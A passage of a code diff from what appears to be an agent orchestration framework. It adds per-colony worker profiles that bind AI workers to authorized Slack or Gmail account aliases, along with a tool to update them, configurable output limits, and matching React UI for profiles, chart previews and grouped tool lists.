worker_spec_path,
)
for raw in worker_profiles:
if not isinstance(raw, dict):
continue
profile = WorkerProfile.from_dict(raw)
err = validate_profile_name(profile.name)
if err is not None:
logger.warning("create_colony: invalid profile name %r: %s", profile.name, err)
continue
profile_meta = dict(worker_meta)
profile_meta["profile_name"] = profile.name
if profile.task:
profile_meta["goal"] = {
**profile_meta.get("goal", {}),
"description": profile.task,
}
if profile.prompt_override:
profile_meta["system_prompt"] = (
f"{worker_meta['system_prompt']}\n\n{profile.prompt_override}"
)
if profile.tool_filter:
profile_meta["tools"] = [t for t in worker_meta["tools"] if t in set(profile.tool_filter)]
if isinstance(profile.concurrency_hint, int) and profile.concurrency_hint > 0:
profile_meta["concurrency_hint"] = profile.concurrency_hint
if profile.integrations:
profile_meta["integrations"] = dict(profile.integrations)
target = worker_spec_path(colony_name, profile.name)
if profile.name == DEFAULT_PROFILE_NAME:
# Skip — the legacy file already written above is the
# canonical default.
persisted_profiles.append(profile.to_dict())
continue
target.parent.mkdir(parents=True, exist_ok=True)
target.write_text(json.dumps(profile_meta, indent=2, ensure_ascii=False), encoding="utf-8")
persisted_profiles.append(profile.to_dict())
# ── 3. Duplicate queen session into colony ───────────────────
# Copy the queen's full session directory (conversations, events,
# meta) into a new queen-session dir assigned to this colony.
@@ -1577,6 +1628,20 @@ async def fork_session_into_colony(
"task": worker_task[:100],
"spawned_at": datetime.now(UTC).isoformat(),
}
if persisted_profiles:
# Persist the canonical profile roster so dispatch + UI can read
# back what the queen declared at create_colony time. Merge with
# any existing list so a later update_worker_profile call doesn't
# erase profiles created in an earlier fork.
existing_profiles = metadata.get("worker_profiles") or []
if not isinstance(existing_profiles, list):
existing_profiles = []
seen = {p["name"] for p in persisted_profiles if isinstance(p, dict) and p.get("name")}
merged = list(persisted_profiles) + [
p for p in existing_profiles
if isinstance(p, dict) and p.get("name") and p["name"] not in seen
]
metadata["worker_profiles"] = merged
metadata_path.write_text(json.dumps(metadata, indent=2, ensure_ascii=False), encoding="utf-8")
# ── 4a. Inherit the queen's tool allowlist into the colony ───
+5 -2
View File
@@ -19,7 +19,7 @@ from datetime import datetime
from pathlib import Path
from typing import Any, Literal
from framework.config import QUEENS_DIR
from framework.config import QUEENS_DIR, get_max_tokens
from framework.host.triggers import TriggerDefinition
logger = logging.getLogger(__name__)
@@ -700,7 +700,10 @@ class SessionManager:
available_tools=all_tools,
goal_context=goal.to_prompt_context(),
goal=goal,
max_tokens=8192,
# Worker output cap — pull from configuration.json instead of
# hard-coding 8192. glm-5.1/kimi-k2.5 both support 32k out, and
# capping at 8k silently truncates long worker turns mid-tool.
max_tokens=get_max_tokens(),
stream_id=worker_name,
execution_id=worker_name,
identity_prompt=worker_data.get("identity_prompt", ""),
@@ -11,7 +11,7 @@ metadata:
**Applies when** your spawn message has `db_path:` and `colony_id:` fields. The DB is your durable working memory — tells you what's done, what to skip, which SOP gates you owe.
Access via `execute_command_tool` running `sqlite3 "<db_path>" "..."`. Tables: `tasks` (queue), `steps` (per-task decomposition), `sop_checklist` (hard gates).
Access via `terminal_exec` running `sqlite3 "<db_path>" "..."`. Tables: `tasks` (queue), `steps` (per-task decomposition), `sop_checklist` (hard gates).
### Claim: assigned task (check this FIRST)
@@ -410,7 +410,7 @@ In all of these cases the script is SHORT (< 10 lines) and the result is CONSUME
- If a tool fails, retry once with the same approach.
- If it fails a second time, STOP retrying and switch approach.
- If `browser_snapshot` fails, try `browser_get_text` with a specific small selector as fallback.
- If `browser_open` fails or page seems stale, `browser_stop`, then `browser_start`, then retry.
- If `browser_open` fails or page seems stale, `browser_stop`, then `browser_open(url)` again to recreate a fresh context.
## Verified workflows
@@ -1642,6 +1642,7 @@ def register_queen_lifecycle_tools(
tasks: list[dict] | None = None,
concurrency_hint: int | None = None,
triggers: list[dict] | None = None,
worker_profiles: list[dict] | None = None,
) -> str:
"""Create a colony and materialize its skill folder in one atomic call.
@@ -1822,6 +1823,7 @@ def register_queen_lifecycle_tools(
concurrency_hint=(
concurrency_hint if isinstance(concurrency_hint, int) and concurrency_hint > 0 else None
),
worker_profiles=worker_profiles if isinstance(worker_profiles, list) else None,
)
except Exception as e:
logger.exception("create_colony: fork failed after installing skill")
@@ -2184,6 +2186,46 @@ def register_queen_lifecycle_tools(
"required": ["id", "trigger_type", "trigger_config", "task"],
},
},
"worker_profiles": {
"type": "array",
"description": (
"Optional roster of worker profiles. Use this "
"when the colony needs to operate multiple "
"authorized accounts of the same vendor (two "
"Slack workspaces, two Gmail accounts) — each "
"profile pins its own credential alias so workers "
"spawned under that profile call Slack/Gmail/etc. "
"as the right account by default. If omitted, the "
"colony has a single implicit 'default' profile "
"that uses each provider's primary account. Each "
"entry: name (lowercase id, unique within the "
"colony), integrations (provider id → account "
"alias, e.g. {'slack': 'work'}), optional task "
"(per-profile task override), optional skill_name "
"(if the profile uses a different skill than the "
"colony default), optional concurrency_hint, "
"prompt_override, tool_filter."
),
"items": {
"type": "object",
"properties": {
"name": {"type": "string"},
"task": {"type": "string"},
"skill_name": {"type": "string"},
"integrations": {
"type": "object",
"additionalProperties": {"type": "string"},
},
"concurrency_hint": {"type": "integer", "minimum": 1},
"prompt_override": {"type": "string"},
"tool_filter": {
"type": "array",
"items": {"type": "string"},
},
},
"required": ["name"],
},
},
},
"required": [
"colony_name",
@@ -2201,6 +2243,116 @@ def register_queen_lifecycle_tools(
)
tools_registered += 1
# --- update_worker_profile ---------------------------------------------------
async def update_worker_profile(
*,
colony_name: str,
profile_name: str,
integrations: dict[str, str] | None = None,
task: str | None = None,
skill_name: str | None = None,
concurrency_hint: int | None = None,
prompt_override: str | None = None,
tool_filter: list[str] | None = None,
) -> str:
"""Insert or update a single worker profile on an existing colony.
Use this to adjust an account binding ("switch the slack-work
profile from alias 'work' to alias 'work-2'") or to add a new
profile after the colony was already created. Existing siblings
are preserved. Pass only the fields you want to change; ``None``
means "don't touch", and an empty dict/list means "clear".
"""
from framework.host.worker_profiles import (
WorkerProfile,
get_worker_profile,
upsert_worker_profile,
validate_profile_name,
)
cn = (colony_name or "").strip()
if not _COLONY_NAME_RE.match(cn):
return json.dumps(
{"error": "colony_name must be lowercase alphanumeric with underscores."}
)
err = validate_profile_name(profile_name)
if err is not None:
return json.dumps({"error": err})
existing = get_worker_profile(cn, profile_name)
merged = WorkerProfile(
name=profile_name,
task=existing.task if existing else "",
skill_name=existing.skill_name if existing else "",
integrations=dict(existing.integrations) if existing else {},
concurrency_hint=existing.concurrency_hint if existing else None,
prompt_override=existing.prompt_override if existing else None,
tool_filter=list(existing.tool_filter) if (existing and existing.tool_filter) else None,
)
if integrations is not None:
merged.integrations = {str(k): str(v) for k, v in integrations.items() if str(k) and str(v)}
if task is not None:
merged.task = task
if skill_name is not None:
merged.skill_name = skill_name
if concurrency_hint is not None:
merged.concurrency_hint = (
concurrency_hint if isinstance(concurrency_hint, int) and concurrency_hint > 0 else None
)
if prompt_override is not None:
merged.prompt_override = prompt_override or None
if tool_filter is not None:
merged.tool_filter = list(tool_filter) if tool_filter else None
try:
saved = upsert_worker_profile(cn, merged)
except (FileNotFoundError, ValueError) as exc:
return json.dumps({"error": str(exc)})
return json.dumps(
{
"ok": True,
"colony_name": cn,
"profile_name": profile_name,
"worker_profiles": [p.to_dict() for p in saved],
}
)
_update_worker_profile_tool = Tool(
name="update_worker_profile",
description=(
"Insert or update one worker profile on an existing colony. "
"Use this to swap a profile's account alias (e.g. 'switch "
"slack-work to use alias work-2') or to add a profile after "
"create_colony. Existing siblings are preserved. Pass only "
"the fields you want to change."
),
parameters={
"type": "object",
"properties": {
"colony_name": {"type": "string"},
"profile_name": {"type": "string"},
"integrations": {
"type": "object",
"additionalProperties": {"type": "string"},
},
"task": {"type": "string"},
"skill_name": {"type": "string"},
"concurrency_hint": {"type": "integer", "minimum": 1},
"prompt_override": {"type": "string"},
"tool_filter": {"type": "array", "items": {"type": "string"}},
},
"required": ["colony_name", "profile_name"],
},
)
registry.register(
"update_worker_profile",
_update_worker_profile_tool,
lambda inputs: update_worker_profile(**inputs),
)
tools_registered += 1
# --- start_incubating_colony -------------------------------------------------
async def start_incubating_colony(
+1264 -2
View File
File diff suppressed because it is too large Load Diff
+2
View File
@@ -11,7 +11,9 @@
},
"dependencies": {
"clsx": "^2.1.1",
"echarts": "^5.6.0",
"lucide-react": "^0.575.0",
"mermaid": "^11.14.0",
"react": "^18.3.1",
"react-dom": "^18.3.1",
"react-markdown": "^10.1.0",
+37
View File
@@ -25,6 +25,19 @@ export interface ColonyToolsUpdateResult {
note?: string;
}
/** A worker template within a colony. ``integrations`` maps provider
* id (``slack``, ``google``, etc.) to the alias of the connected
* account this profile pins by default for MCP tool calls. */
export interface WorkerProfile {
name: string;
task?: string;
skill_name?: string;
integrations?: Record<string, string>;
concurrency_hint?: number;
prompt_override?: string;
tool_filter?: string[];
}
export const coloniesApi = {
/** List every colony on disk with a summary of its tool allowlist. */
list: () =>
@@ -47,4 +60,28 @@ export const coloniesApi = {
`/colony/${encodeURIComponent(colonyName)}/tools`,
{ enabled_mcp_tools: enabled },
),
/** List the colony's worker profiles. Always returns at least one
* entry — legacy colonies materialise a synthetic ``default``. */
listWorkerProfiles: (colonyName: string) =>
api.get<{ worker_profiles: WorkerProfile[] }>(
`/colonies/${encodeURIComponent(colonyName)}/worker_profiles`,
),
/** Insert or replace a single worker profile. Existing siblings are
* preserved. The desktop uses this for both add and edit. */
upsertWorkerProfile: (colonyName: string, profile: WorkerProfile) =>
api.post<{ worker_profiles: WorkerProfile[] }>(
`/colonies/${encodeURIComponent(colonyName)}/worker_profiles`,
profile,
),
/** Delete a worker profile. Returns 409 with ``bound_workers`` when a
* live worker is still using it; the UI should prompt the user to
* stop those workers first. The synthetic ``default`` profile cannot
* be deleted. */
deleteWorkerProfile: (colonyName: string, profileName: string) =>
api.delete<{ deleted: boolean; profile_name: string }>(
`/colonies/${encodeURIComponent(colonyName)}/worker_profiles/${encodeURIComponent(profileName)}`,
),
};
+5
View File
@@ -14,6 +14,11 @@ export interface WorkerSummary {
status: string;
started_at: number;
result: WorkerResult | null;
/** Name of the colony's worker profile this worker was spawned from.
* Empty for legacy / single-template colonies. Surfaced as a small
* badge in the Sessions tab so the user can see which authorized
* account the worker is calling MCP tools as. */
profile_name?: string;
}
export interface ColonySkill {
+61 -45
View File
@@ -13,6 +13,9 @@ import {
} from "lucide-react";
import WorkerRunBubble from "@/components/WorkerRunBubble";
import type { WorkerRunGroup } from "@/components/WorkerRunBubble";
import ChartToolDetail, {
type ChartToolEntry,
} from "@/components/charts/ChartToolDetail";
export interface ImageContent {
type: "image_url";
@@ -205,7 +208,7 @@ export function toolHex(name: string): string {
}
export function ToolActivityRow({ content }: { content: string }) {
let tools: { name: string; done: boolean }[] = [];
let tools: ChartToolEntry[] = [];
try {
const parsed = JSON.parse(content);
tools = parsed.tools || [];
@@ -239,52 +242,65 @@ export function ToolActivityRow({ content }: { content: string }) {
if (counts.done > 0) donePills.push({ name, count: counts.done });
}
// Per-call chart embeds: chart_render's result envelope carries the
// spec back, so the chat renders the same chart the server
// rasterized to PNG. Other tools stay pill-only by design.
const chartDetails = tools.filter((t) => t.name.startsWith("chart_"));
return (
<div className="flex gap-3 pl-10">
<div className="flex flex-wrap items-center gap-1.5">
{runningPills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`run-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Loader2 className="w-2.5 h-2.5 animate-spin" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] font-medium opacity-70">
×{p.count}
</span>
)}
</span>
);
})}
{donePills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`done-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Check className="w-2.5 h-2.5" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] opacity-80">×{p.count}</span>
)}
</span>
);
})}
<div className="flex flex-col gap-0.5">
<div className="flex gap-3 pl-10">
<div className="flex flex-wrap items-center gap-1.5">
{runningPills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`run-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Loader2 className="w-2.5 h-2.5 animate-spin" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] font-medium opacity-70">
×{p.count}
</span>
)}
</span>
);
})}
{donePills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`done-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Check className="w-2.5 h-2.5" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] opacity-80">×{p.count}</span>
)}
</span>
);
})}
</div>
</div>
{chartDetails.map((t, idx) => (
<ChartToolDetail
key={t.callKey ?? `${t.name}-${idx}`}
entry={t}
/>
))}
</div>
);
}
@@ -15,6 +15,11 @@ import {
Zap,
Activity,
Loader2,
Plus,
Trash2,
Pencil,
Check,
Link2,
} from "lucide-react";
import {
colonyWorkersApi,
@@ -24,6 +29,8 @@ import {
type ProgressStep,
type WorkerSummary,
} from "@/api/colonyWorkers";
import { coloniesApi, type WorkerProfile } from "@/api/colonies";
import { credentialsApi } from "@/api/credentials";
import {
colonyDataApi,
type CellValue,
@@ -51,7 +58,7 @@ interface ColonyWorkersPanelProps {
onClose: () => void;
}
type TabKey = "skills" | "tools" | "sessions" | "triggers" | "data";
type TabKey = "skills" | "tools" | "sessions" | "triggers" | "data" | "profiles";
function statusClasses(status: string): string {
const s = status.toLowerCase();
@@ -165,6 +172,7 @@ export default function ColonyWorkersPanel({
{/* Tab bar */}
<div className="flex border-b border-border/60 flex-shrink-0">
<TabButton active={tab === "sessions"} onClick={() => setTab("sessions")} label="Sessions" />
<TabButton active={tab === "profiles"} onClick={() => setTab("profiles")} label="Profiles" />
<TabButton active={tab === "triggers"} onClick={() => setTab("triggers")} label="Triggers" />
<TabButton active={tab === "skills"} onClick={() => setTab("skills")} label="Skills" />
<TabButton active={tab === "tools"} onClick={() => setTab("tools")} label="Tools" />
@@ -175,6 +183,7 @@ export default function ColonyWorkersPanel({
{tab === "sessions" && (
<SessionsTab sessionId={sessionId} colonyName={colonyName} />
)}
{tab === "profiles" && <ProfilesTab colonyName={colonyName} />}
{tab === "triggers" && <TriggersTab sessionId={sessionId} />}
{tab === "skills" && <SkillsTab sessionId={sessionId} />}
{tab === "tools" && <ToolsTab sessionId={sessionId} />}
@@ -630,11 +639,21 @@ function SessionsTab({
className="w-full text-left px-3 py-2.5"
>
<div className="flex items-center justify-between mb-1 gap-2">
<code
className={`text-xs font-mono ${active ? "text-foreground" : "text-foreground/70"}`}
>
{shortId(w.worker_id)}
</code>
<div className="flex items-center gap-1.5 min-w-0">
<code
className={`text-xs font-mono ${active ? "text-foreground" : "text-foreground/70"}`}
>
{shortId(w.worker_id)}
</code>
{w.profile_name && (
<span
className="text-[10px] px-1.5 py-0.5 rounded-full bg-primary/10 text-primary font-medium truncate"
title={`Worker profile: ${w.profile_name}`}
>
{w.profile_name}
</span>
)}
</div>
<div className="flex items-center gap-1">
<span
className={`text-[10px] px-1.5 py-0.5 rounded-full font-medium ${statusClasses(w.status)}`}
@@ -1922,3 +1941,467 @@ function TabShell({
</div>
);
}
// ── Profiles tab ───────────────────────────────────────────────────────
//
// Lists the colony's worker profiles. Each profile pins a default
// account alias per provider so workers spawned under it call MCP
// tools as the right Slack workspace / Gmail account / etc. The alias
// dropdown only shows aliases the user has already authorized through
// the integrations page — typo-prone free-form entry was rejected as a
// foothold for misdirected tool calls.
//
// Delete is refused while a worker is still bound to the profile; the
// 409 surfaces as an inline notice listing the worker IDs the user
// needs to stop first.
function ProfilesTab({ colonyName }: { colonyName: string | null }) {
const [profiles, setProfiles] = useState<WorkerProfile[]>([]);
const [accounts, setAccounts] = useState<Record<string, string[]>>({});
const [accountIdentities, setAccountIdentities] = useState<
Record<string, Record<string, Record<string, string>>>
>({});
const [loading, setLoading] = useState(true);
const [error, setError] = useState<string | null>(null);
const [editingName, setEditingName] = useState<string | null>(null);
const [creating, setCreating] = useState(false);
const [busy, setBusy] = useState(false);
const [boundWarning, setBoundWarning] = useState<string | null>(null);
const refresh = useCallback(() => {
if (!colonyName) {
setLoading(false);
return;
}
setLoading(true);
setError(null);
Promise.all([
coloniesApi.listWorkerProfiles(colonyName),
credentialsApi.listSpecs(),
])
.then(([profileResp, specsResp]) => {
setProfiles(profileResp.worker_profiles ?? []);
const aliasMap: Record<string, string[]> = {};
const idMap: Record<string, Record<string, Record<string, string>>> = {};
for (const spec of specsResp.specs ?? []) {
if (!spec.aden_supported) continue;
const provider = spec.credential_id;
const aliases: string[] = [];
const idsForProvider: Record<string, Record<string, string>> = {};
for (const acct of spec.accounts ?? []) {
if (!acct.alias) continue;
aliases.push(acct.alias);
idsForProvider[acct.alias] = acct.identity ?? {};
}
if (aliases.length > 0) {
aliasMap[provider] = aliases;
idMap[provider] = idsForProvider;
}
}
setAccounts(aliasMap);
setAccountIdentities(idMap);
})
.catch((e) =>
setError(
e?.message ?? "Failed to load worker profiles",
),
)
.finally(() => setLoading(false));
}, [colonyName]);
useEffect(() => {
refresh();
}, [refresh]);
const handleSave = useCallback(
async (profile: WorkerProfile) => {
if (!colonyName) return;
setBusy(true);
setError(null);
setBoundWarning(null);
try {
const resp = await coloniesApi.upsertWorkerProfile(colonyName, profile);
setProfiles(resp.worker_profiles ?? []);
setEditingName(null);
setCreating(false);
} catch (e: unknown) {
setError((e as Error)?.message ?? "Save failed");
} finally {
setBusy(false);
}
},
[colonyName],
);
const handleDelete = useCallback(
async (profileName: string) => {
if (!colonyName) return;
setBusy(true);
setError(null);
setBoundWarning(null);
try {
await coloniesApi.deleteWorkerProfile(colonyName, profileName);
refresh();
} catch (e: unknown) {
// Surface 409 bound_workers payloads as an inline notice with the
// worker IDs so the user knows exactly what to stop. The api
// client throws on non-2xx; the response body is on `cause`.
const err = e as Error & { body?: { bound_workers?: string[]; error?: string } };
const bound = err.body?.bound_workers;
if (Array.isArray(bound) && bound.length > 0) {
setBoundWarning(
`Profile "${profileName}" is bound to running worker${
bound.length === 1 ? "" : "s"
} ${bound.map(shortId).join(", ")}. Stop them first.`,
);
} else {
setError(err.message ?? "Delete failed");
}
} finally {
setBusy(false);
}
},
[colonyName, refresh],
);
if (!colonyName) {
return (
<TabShell loading={false} error={null} onRefresh={() => {}} empty="No colony loaded.">
{null}
</TabShell>
);
}
return (
<TabShell
loading={loading}
error={error}
onRefresh={refresh}
empty={null}
headerRight={
!creating && editingName === null ? (
<button
onClick={() => setCreating(true)}
className="text-[10px] px-2 py-0.5 rounded border border-primary/40 text-primary hover:bg-primary/10 transition-colors inline-flex items-center gap-1"
>
<Plus className="w-3 h-3" /> Add profile
</button>
) : null
}
>
<div className="flex flex-col gap-3">
{boundWarning && (
<div className="rounded-md border border-amber-500/40 bg-amber-500/[0.06] px-3 py-2 text-xs text-amber-700 dark:text-amber-400">
{boundWarning}
</div>
)}
<ConnectedAccountsSummary accounts={accounts} identities={accountIdentities} />
{creating && (
<ProfileEditor
mode="create"
existing={null}
availableAliases={accounts}
existingNames={profiles.map((p) => p.name)}
busy={busy}
onCancel={() => setCreating(false)}
onSave={handleSave}
/>
)}
{profiles.length === 0 && !creating ? (
<p className="text-xs text-muted-foreground text-center py-6">
No profiles yet. The colony spawns one default worker.
</p>
) : (
<ul className="flex flex-col gap-2">
{profiles.map((p) =>
editingName === p.name ? (
<li key={p.name}>
<ProfileEditor
mode="edit"
existing={p}
availableAliases={accounts}
existingNames={profiles.map((x) => x.name)}
busy={busy}
onCancel={() => setEditingName(null)}
onSave={handleSave}
/>
</li>
) : (
<li key={p.name}>
<ProfileRow
profile={p}
onEdit={() => {
setEditingName(p.name);
setBoundWarning(null);
}}
onDelete={() => handleDelete(p.name)}
isDefault={p.name === "default"}
busy={busy}
/>
</li>
),
)}
</ul>
)}
</div>
</TabShell>
);
}
function ConnectedAccountsSummary({
accounts,
identities,
}: {
accounts: Record<string, string[]>;
identities: Record<string, Record<string, Record<string, string>>>;
}) {
const providers = Object.keys(accounts).sort();
if (providers.length === 0) {
return (
<div className="rounded-md border border-border/50 bg-muted/20 px-3 py-2 text-xs text-muted-foreground">
No connected accounts yet connect providers in the integrations page
before binding profiles.
</div>
);
}
return (
<div className="rounded-md border border-border/50 bg-muted/10 px-3 py-2">
<div className="flex items-center gap-1.5 text-[10px] uppercase tracking-wide text-muted-foreground mb-1.5">
<Link2 className="w-3 h-3" /> Connected accounts
</div>
<ul className="flex flex-wrap gap-1.5">
{providers.flatMap((provider) =>
accounts[provider].map((alias) => {
const ident = identities[provider]?.[alias];
const detail = ident?.email || ident?.name || "";
return (
<li
key={`${provider}:${alias}`}
className="text-[10px] px-1.5 py-0.5 rounded-full bg-background border border-border/60 text-foreground/80"
title={detail || `${provider}:${alias}`}
>
<span className="font-medium">{provider}</span>:{alias}
</li>
);
}),
)}
</ul>
</div>
);
}
function ProfileRow({
profile,
onEdit,
onDelete,
isDefault,
busy,
}: {
profile: WorkerProfile;
onEdit: () => void;
onDelete: () => void;
isDefault: boolean;
busy: boolean;
}) {
const integrations = profile.integrations ?? {};
const entries = Object.entries(integrations);
return (
<div className="rounded-lg border border-border/50 bg-background/30 px-3 py-2.5">
<div className="flex items-start justify-between gap-2 mb-1.5">
<div className="min-w-0">
<div className="flex items-center gap-1.5">
<span className="text-xs font-medium text-foreground truncate">
{profile.name}
</span>
{isDefault && (
<span className="text-[9px] px-1 py-0.5 rounded bg-muted text-muted-foreground uppercase tracking-wide">
default
</span>
)}
</div>
{profile.task && (
<p className="text-[11px] text-muted-foreground mt-0.5 line-clamp-2">
{profile.task}
</p>
)}
</div>
<div className="flex items-center gap-1 flex-shrink-0">
<button
onClick={onEdit}
disabled={busy}
className="p-1 rounded text-muted-foreground hover:text-foreground hover:bg-muted/60 disabled:opacity-50 transition-colors"
title="Edit profile"
>
<Pencil className="w-3 h-3" />
</button>
{!isDefault && (
<button
onClick={onDelete}
disabled={busy}
className="p-1 rounded text-destructive hover:bg-destructive/10 disabled:opacity-50 transition-colors"
title="Delete profile"
>
<Trash2 className="w-3 h-3" />
</button>
)}
</div>
</div>
{entries.length > 0 ? (
<ul className="flex flex-wrap gap-1">
{entries.map(([provider, alias]) => (
<li
key={provider}
className="text-[10px] px-1.5 py-0.5 rounded-full bg-primary/10 text-primary border border-primary/20"
>
<span className="font-medium">{provider}</span>:{alias}
</li>
))}
</ul>
) : (
<p className="text-[10px] text-muted-foreground italic">
No integrations bound uses each provider's primary account.
</p>
)}
</div>
);
}
function ProfileEditor({
mode,
existing,
availableAliases,
existingNames,
busy,
onCancel,
onSave,
}: {
mode: "create" | "edit";
existing: WorkerProfile | null;
availableAliases: Record<string, string[]>;
existingNames: string[];
busy: boolean;
onCancel: () => void;
onSave: (profile: WorkerProfile) => void;
}) {
const [name, setName] = useState(existing?.name ?? "");
const [task, setTask] = useState(existing?.task ?? "");
const [bindings, setBindings] = useState<Record<string, string>>(
() => ({ ...(existing?.integrations ?? {}) }),
);
const providers = useMemo(() => Object.keys(availableAliases).sort(), [availableAliases]);
const nameError = useMemo(() => {
if (!name) return "Name is required";
if (!/^[a-z0-9][a-z0-9_-]{0,63}$/.test(name)) {
return "lowercase, numbers, _ or - (must start alphanumeric, ≤64)";
}
if (mode === "create" && existingNames.includes(name)) {
return "Name already used";
}
return null;
}, [name, mode, existingNames]);
const setAlias = (provider: string, alias: string) => {
setBindings((prev) => {
const next = { ...prev };
if (alias) next[provider] = alias;
else delete next[provider];
return next;
});
};
return (
<div className="rounded-lg border border-primary/40 bg-primary/[0.04] px-3 py-3 flex flex-col gap-2.5">
<div>
<label className="text-[10px] uppercase tracking-wide text-muted-foreground block mb-1">
Profile name
</label>
<input
value={name}
onChange={(e) => setName(e.target.value)}
disabled={mode === "edit"}
className="w-full text-xs px-2 py-1 rounded border border-border/60 bg-background disabled:opacity-60"
placeholder="slack-work"
/>
{nameError && (
<p className="text-[10px] text-destructive mt-0.5">{nameError}</p>
)}
</div>
<div>
<label className="text-[10px] uppercase tracking-wide text-muted-foreground block mb-1">
Task override (optional)
</label>
<textarea
value={task}
onChange={(e) => setTask(e.target.value)}
rows={2}
className="w-full text-xs px-2 py-1 rounded border border-border/60 bg-background resize-none"
placeholder="What this profile's worker should do (overrides the colony task)"
/>
</div>
<div>
<label className="text-[10px] uppercase tracking-wide text-muted-foreground block mb-1">
Account bindings
</label>
{providers.length === 0 ? (
<p className="text-[10px] text-muted-foreground italic">
No connected accounts yet. Authorize providers in the integrations
page first.
</p>
) : (
<ul className="flex flex-col gap-1.5">
{providers.map((provider) => (
<li key={provider} className="flex items-center gap-2">
<span className="text-[11px] font-medium text-foreground/80 w-20 truncate">
{provider}
</span>
<select
value={bindings[provider] ?? ""}
onChange={(e) => setAlias(provider, e.target.value)}
className="flex-1 text-xs px-1.5 py-0.5 rounded border border-border/60 bg-background"
>
<option value="">— primary —</option>
{availableAliases[provider].map((alias) => (
<option key={alias} value={alias}>
{alias}
</option>
))}
</select>
</li>
))}
</ul>
)}
</div>
<div className="flex justify-end gap-2 pt-1">
<button
onClick={onCancel}
disabled={busy}
className="text-[11px] px-2.5 py-1 rounded border border-border/60 text-muted-foreground hover:text-foreground hover:bg-muted/30 disabled:opacity-50 transition-colors"
>
Cancel
</button>
<button
onClick={() =>
onSave({
name,
task: task || undefined,
integrations: bindings,
})
}
disabled={busy || nameError !== null}
className="text-[11px] px-2.5 py-1 rounded bg-primary text-primary-foreground hover:bg-primary/90 disabled:opacity-50 transition-colors inline-flex items-center gap-1"
>
<Check className="w-3 h-3" /> Save
</button>
</div>
</div>
);
}
+92 -12
View File
@@ -8,7 +8,7 @@ import {
Wrench,
AlertCircle,
} from "lucide-react";
import type { ToolMeta, McpServerTools } from "@/api/queens";
import type { ToolMeta, McpServerTools, ToolCategory } from "@/api/queens";
/** Shape every Tools section (Queen / Colony) shares. */
export interface ToolsSnapshot {
@@ -17,11 +17,86 @@ export interface ToolsSnapshot {
lifecycle: ToolMeta[];
synthetic: ToolMeta[];
mcp_servers: McpServerTools[];
/** Optional: curated category groupings (queens only today). When
* present, tools that belong to a category are grouped under that
* category instead of their MCP server. */
categories?: ToolCategory[];
/** Optional: when true, the allowlist came from the role-based
* default (no explicit save). Only queens surface this today. */
is_role_default?: boolean;
}
type ToolWithEnabled = ToolMeta & { enabled: boolean };
interface RenderGroup {
/** Stable key for expansion state and React keys. */
key: string;
/** Display title shown in the collapsible header. */
title: string;
tools: ToolWithEnabled[];
}
/** Snake_case / kebab-case → Title Case for category labels so they
* read naturally next to MCP server names. */
function formatCategoryTitle(name: string): string {
return name
.split(/[_-]+/)
.filter((w) => w.length > 0)
.map((w) => w.charAt(0).toUpperCase() + w.slice(1))
.join(" ");
}
/** Build display groups with the priority: category → MCP server → "Other tools".
* A tool that belongs to multiple categories lands in the first one (input order). */
function buildGroups(
mcpServers: McpServerTools[],
categories: ToolCategory[] | undefined,
): RenderGroup[] {
const toolCategory = new Map<string, string>();
categories?.forEach((cat) => {
cat.tools.forEach((toolName) => {
if (!toolCategory.has(toolName)) toolCategory.set(toolName, cat.name);
});
});
const groupMap = new Map<string, RenderGroup>();
// Pre-seed category groups in their original order so categories
// come before MCP servers regardless of which tool we encounter first.
categories?.forEach((cat) => {
groupMap.set(`cat:${cat.name}`, {
key: `cat:${cat.name}`,
title: formatCategoryTitle(cat.name),
tools: [],
});
});
mcpServers.forEach((srv) => {
srv.tools.forEach((t) => {
const cat = toolCategory.get(t.name);
let key: string;
let title: string;
if (cat) {
key = `cat:${cat}`;
title = formatCategoryTitle(cat);
} else if (srv.name && srv.name !== "(unknown)") {
key = `srv:${srv.name}`;
title = srv.name;
} else {
key = "other";
title = "Other tools";
}
let group = groupMap.get(key);
if (!group) {
group = { key, title, tools: [] };
groupMap.set(key, group);
}
group.tools.push(t);
});
});
return Array.from(groupMap.values()).filter((g) => g.tools.length > 0);
}
export interface ToolsEditorProps {
/** Stable identifier — refetches when it changes. */
subjectKey: string;
@@ -219,6 +294,11 @@ export default function ToolsEditor({
return s;
}, [data]);
const groups = useMemo(
() => (data ? buildGroups(data.mcp_servers, data.categories) : []),
[data],
);
const dirty = useMemo(() => {
const a = draftAllowed;
const b = baselineRef.current;
@@ -401,10 +481,10 @@ export default function ToolsEditor({
</CollapsibleGroup>
)}
{data.mcp_servers.map((srv) => {
const toolNames = srv.tools.map((t) => t.name);
{groups.map((group) => {
const toolNames = group.tools.map((t) => t.name);
const state = triStateForServer(toolNames, draftAllowed);
const enabledInServer =
const enabledInGroup =
draftAllowed === null
? toolNames.length
: toolNames.reduce(
@@ -413,13 +493,13 @@ export default function ToolsEditor({
);
return (
<CollapsibleGroup
key={srv.name}
title={srv.name === "(unknown)" ? "MCP Tools" : srv.name}
count={srv.tools.length}
badge={`${enabledInServer}/${srv.tools.length}`}
expanded={!!expanded[srv.name]}
key={group.key}
title={group.title}
count={group.tools.length}
badge={`${enabledInGroup}/${group.tools.length}`}
expanded={!!expanded[group.key]}
onToggle={() =>
setExpanded((p) => ({ ...p, [srv.name]: !p[srv.name] }))
setExpanded((p) => ({ ...p, [group.key]: !p[group.key] }))
}
leading={
<TriStateCheckbox
